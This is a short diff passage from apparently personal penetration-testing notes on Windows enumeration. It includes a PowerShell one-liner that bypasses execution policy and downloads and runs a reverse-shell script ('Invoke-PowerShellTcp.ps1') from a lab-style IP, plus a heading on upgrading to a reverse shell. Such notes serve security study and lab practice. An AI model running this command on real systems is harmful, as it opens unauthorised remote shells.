grandMa5ter/Cyber-Sec-Notes/offensive/enumeration-windows.md

 CMD C:\> @"%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command "iex ((New-Object System.Net.WebClient).DownloadString('http://10.10.10.10/Invoke-PowerShellTcp.ps1'))"
 ```

-### Upgrade Windows Command Line with a Powershell One-liner Reverse Shell:
+### Upgrade Windows Command Line with a Powershell One-liner Reverse Shell

 You can run this oneliner from the remote Windows command prompt to skip the file upload step entirely (again be sure to update the IP and port):